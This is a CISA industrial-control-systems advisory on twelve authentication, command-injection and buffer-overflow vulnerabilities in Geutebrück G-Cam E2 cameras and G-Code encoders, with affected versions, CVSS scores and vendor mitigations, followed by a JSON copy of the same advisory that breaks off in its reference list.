Geutebrück G-Cam E2 and G-Code

2021-07-27T00:00:00

Description

## 1\. EXECUTIVE SUMMARY * **CVSS v3 9.8** * **ATTENTION: **Exploitable remotely/low attack complexity/public exploits are available * **Vendor:** Geutebrück * **Equipment: **G-Cam E2 and G-Code * **Vulnerabilities:** Missing Authentication for Critical Function, Command Injection, Stack-based Buffer Overflow ## 2\. RISK EVALUATION UDP Technology supplies multiple OEMs such as Geutebrück with firmware for IP cameras. Successful exploitation of these vulnerabilities could allow unauthenticated access to sensitive information; buffer overflow and command injection conditions may allow remote code execution. ## 3\. TECHNICAL DETAILS ### 3.1 AFFECTED PRODUCTS The following Geutebrück devices contain the affected third-party firmware provided by UDP Technology: * E2 Series cameras – G-CAM; Versions 1.12.0.27 and prior, Versions 1.12.13.2 and 1.12.14.5 * EBC-21xx * EFD-22xx * ETHC-22xx * EWPC-22xx * Encoder G-Code; Versions 1.12.0.27 and prior, Versions 1.12.13.2 and 1.12.14.5 * EEC-2xx * EEN-20xx ### 3.2 VULNERABILITY OVERVIEW #### 3.2.1 [MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306](<https://cwe.mitre.org/data/definitions/306.html>) The affected product allows unauthenticated remote access to sensitive files due to default user authentication settings. [CVE-2021-33543](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33543>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.2 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33544](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33544>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.3 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>) The affected product is vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33545](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33545>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.4 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>) The affected product is vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33546](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33546>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.5 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>) The affected product is vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33547](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33547>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.6 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33548](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33548>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.7 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>) The affected product is vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33549](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33549>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.8 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33550](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33550>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.9 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33551](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33551>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.10 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33552](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33552>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.11 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33553](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33553>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). #### 3.2.12 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>) The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. [CVE-2021-33554](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33554>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)). ### 3.3 BACKGROUND * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Energy, Financial Services, Government Facilities, Healthcare and Public Health, Transportation Systems * **COUNTRIES/AREAS DEPLOYED: **Worldwide * **COMPANY HEADQUARTERS LOCATION: **Germany ### 3.4 RESEARCHER Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA. ## 4\. MITIGATIONS Geutebrück strongly recommends updating all affected cameras and encoders listed above to firmware Version 1.12.14.7 or later. The security advisory and the latest firmware can both be acquired on [Geutebrück’s web portal](<https://gcc02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fportal.geutebrueck.com%2F&data=04%7C01%7Cpaul.lambert%40inl.gov%7Cf980cf8ed61e45ce028808d9505ef3d2%7C4cf464b7869a42368da2a98566485554%7C0%7C0%7C637629191029853114%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=8UP9NuwqOke19wr7iDG2ZjnJt33fyYNXLb3FeAZCPJ0%3D&reserved=0>) (Login required). If updates cannot be deployed, Geutebrück recommends taking the following defensive measures to minimize the risk of exploitation of these vulnerabilities: * Change the default passwords of the cameras. * Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet. * Locate control system networks and remote devices behind firewalls and isolate them from the business network. * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices. * Ultimately shut down or disconnect the cameras from the network. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>). Additional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents. ## Contact Information For any questions related to this report, please contact the CISA at: Email: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) Toll Free: 1-888-282-0870 For industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics or incident reporting: https://us-cert.cisa.gov/report CISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product. This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy. **Please share your thoughts.** We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>); we'd welcome your feedback.

{"id": "ICSA-21-208-03", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Geutebr\u00fcck G-Cam E2 and G-Code", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION: **Exploitable remotely/low attack complexity/public exploits are available\n * **Vendor:** Geutebr\u00fcck\n * **Equipment: **G-Cam E2 and G-Code\n * **Vulnerabilities:** Missing Authentication for Critical Function, Command Injection, Stack-based Buffer Overflow\n\n## 2\\. RISK EVALUATION\n\nUDP Technology supplies multiple OEMs such as Geutebr\u00fcck with firmware for IP cameras. Successful exploitation of these vulnerabilities could allow unauthenticated access to sensitive information; buffer overflow and command injection conditions may allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following Geutebr\u00fcck devices contain the affected third-party firmware provided by UDP Technology:\n\n * E2 Series cameras \u2013 G-CAM; Versions 1.12.0.27 and prior, Versions 1.12.13.2 and 1.12.14.5 \n * EBC-21xx\n * EFD-22xx\n * ETHC-22xx\n * EWPC-22xx\n * Encoder G-Code; Versions 1.12.0.27 and prior, Versions 1.12.13.2 and 1.12.14.5 \n * EEC-2xx\n * EEN-20xx\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [MISSING AUTHENTICATION FOR CRITICAL FUNCTION CWE-306](<https://cwe.mitre.org/data/definitions/306.html>)\n\nThe affected product allows unauthenticated remote access to sensitive files due to default user authentication settings.\n\n[CVE-2021-33543](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33543>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33544](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33544>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe affected product is vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. \n\n[CVE-2021-33545](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33545>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe affected product is vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33546](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33546>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe affected product is vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. \n\n[CVE-2021-33547](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33547>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.6 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33548](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33548>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.7 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe affected product is vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33549](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33549>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.8 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33550](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33550>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.9 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33551](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33551>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.10 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33552](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33552>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.11 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33553](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33553>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.12 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nThe affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33554](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33554>) has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Energy, Financial Services, Government Facilities, Healthcare and Public Health, Transportation Systems\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Germany\n\n### 3.4 RESEARCHER\n\nTitouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nGeutebr\u00fcck strongly recommends updating all affected cameras and encoders listed above to firmware Version 1.12.14.7 or later. The security advisory and the latest firmware can both be acquired on [Geutebr\u00fcck\u2019s web portal](<https://gcc02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fportal.geutebrueck.com%2F&data=04%7C01%7Cpaul.lambert%40inl.gov%7Cf980cf8ed61e45ce028808d9505ef3d2%7C4cf464b7869a42368da2a98566485554%7C0%7C0%7C637629191029853114%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=8UP9NuwqOke19wr7iDG2ZjnJt33fyYNXLb3FeAZCPJ0%3D&reserved=0>) (Login required).\n\nIf updates cannot be deployed, Geutebr\u00fcck recommends taking the following defensive measures to minimize the risk of exploitation of these vulnerabilities:\n\n * Change the default passwords of the cameras.\n * Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls and isolate them from the business network.\n * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n * Ultimately shut down or disconnect the cameras from the network.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>); we'd welcome your feedback.\n", "published": "2021-07-27T00:00:00", "modified": "2021-07-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.us-cert.gov/ics/advisories/icsa-21-208-03", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.cisa.gov/uscert", "https://www.cisa.gov", "https://www.cisa.gov", "https://www.cisa.gov/ics", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-208-03", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-208-03", "https://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-21-208-03", "https://cwe.mitre.org/data/definitions/306.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33543", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33544", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/121.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33545", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/121.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33546", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/121.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33547", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33548", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/121.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33549", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33550", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33551", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33552", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33553", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/77.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33554", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", 